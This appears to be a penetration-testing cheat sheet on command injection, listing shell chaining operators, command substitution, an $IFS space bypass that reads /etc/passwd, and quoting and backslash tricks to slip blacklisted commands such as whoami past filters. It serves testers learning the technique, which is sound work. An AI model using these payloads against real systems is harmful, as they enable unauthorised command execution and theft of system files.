Command Injection

Command injection is a vulnerability that allows the execution of arbitrary commands on the host server, potentially leading to unauthorized access, data theft, or system compromise.

Chaining and Invoking

Combining commands can be achieved (on both, Windows and Linux systems) using these operators

;    # Executes one command and then another
&    # Executes a command in the background, followed by the other one
|    # Redirects the output the first command as input to the second command
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

Its also possible to inject command via command substitution, where the output of a command is captured and used in another context

$(command)    # Both windows and linux systems
`command`     # Only linux systems

Bypasses

• https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions#common-limitations-bypasses

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#filter-bypasses

Space Bypass

It is possible to use the Internal Field Separator $IFS to avoid using spaces on commands

cat${IFS}/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both windows and linux systems
'w'h'o'a'm'i     # Only linux systems
wh''oami         # Both windows and linux systems

# Backslashes
\w\h\o\a\m\i     # Only linux systems
w\h\o\a\m\i      # Only linux systems

# $()
wh$()oami        # Only linux systems
wh$(echo oa)mi   # Only linux systems

# ``
wh``oami         # Only linux systems
wh`echo oa`mi    # Only linux systems

# $@
wh$@oami         # Only linux systems

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection https://book.hacktricks.xyz/pentesting-web/command-injection